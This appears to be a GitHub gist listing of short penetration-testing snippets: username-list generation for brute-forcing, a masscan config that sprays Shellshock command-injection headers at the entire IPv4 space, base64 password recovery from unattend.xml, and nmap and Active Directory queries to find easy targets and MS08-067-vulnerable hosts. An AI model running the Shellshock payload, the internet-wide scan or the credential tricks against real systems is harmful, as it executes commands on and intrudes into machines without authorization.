Matt Kelly breakersall

breakersall / gist:f966fc4e25ba9b231c30

Last active August 29, 2015 14:06

Parse facebook namelist into usable lists for username bruteforcing

	#First.Last
	$Unamestream = new-object System.IO.StreamWriter("names.txt")
	$FNames = Get-Content fname_10.txt
	$LNames = Get-Content lname_10.txt
	foreach ($FName in $FNames)
	{
	foreach ($LName in $LNames)
	{
	$Name = "$FName" + "." + "$LName"
	$Unamestream.WriteLine($Name)

breakersall / gist:9f5250f76295626d6e12

Last active August 29, 2015 14:06

ShellShock Anti-Shock - masscan

	#InfoSec good dead fairy
	#Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
	target = 0.0.0.0/0
	port = 80
	banners = true
	http-user-agent = InfosecFairy
	http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
	http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
	http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y

breakersall / gist:71479c9b68be425b8198

Created July 28, 2014 18:31

Decode base 64 for unattend

	From: http://blog.compower.org/2013/08/05/recover-the-non-plain-password-from-your-unattend-xml/

	$pass = "string"

	PS> [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pass))

breakersall / Find some easy wins nmap

Last active August 29, 2015 14:02

	#Find tomcat/jboss,ms-sql - Uses carlos' https://github.com/darkoperator
	nmap -Pn -p 1433,80,8080,8008,8000,8443,443,8000-8010 -sV -Pn -T4 --min-hostgroup 256 --min-parallelism 32 --script=http-title,ms-sql-empty-password -iL <subnetst2scan> -oX easy-wins.xml
	$nmaphosts = Import-NmapXML -NmapXML easy-wins.xml -InfoType Hosts
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "tomcat"} \| select-object Ipv4Address \| Out-File Tomcat-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "jboss"} \| select-object Ipv4Address \| Out-File Jboss-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "Mbedthis"} \| Select-Object IPv4Address \| Out-File iDRAC-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "ms-sql-server"} \| select-object Ipv4Address \| Out-File MS-SQL-Hosts.txt

breakersall / Find MS08_067 via ADSI and PoshSec-Mod

Last active August 29, 2015 14:02

	#Uses carlos' https://github.com/darkoperator
	$hosts = Get-AuditDSComputerAccount -DomainController <IP> -Credential (Get-Credential)
	$hosts \| Where-Object {(($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 1") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 2") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "")) -or ($_.OperatingSystem -match "2000") -or (($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "") -or ($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "Service Pack 1"))}

	#Find tomcat/jboss,ms-sql - Uses carlos' https://github.com/darkoperator
	nmap -Pn -p 1433,80,8080,8008,8000,8443,443,8000-8010 -sV -Pn -T4 --min-hostgroup 256 --min-parallelism 32 --script=http-title,ms-sql-empty-password -iL <subnetst2scan> -oX easy-wins.xml
	$nmaphosts = Import-NmapXML -NmapXML easy-wins.xml -InfoType Hosts
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "tomcat"} \| select-object Ipv4Address \| Out-File Tomcat-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "jboss"} \| select-object Ipv4Address \| Out-File Jboss-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "Mbedthis"} \| Select-Object IPv4Address \| Out-File iDRAC-Hosts.txt
	$nmaphosts \| Where-Object {$_.Ports.Service.Product -match "ms-sql-server"} \| select-object Ipv4Address \| Out-File MS-SQL-Hosts.txt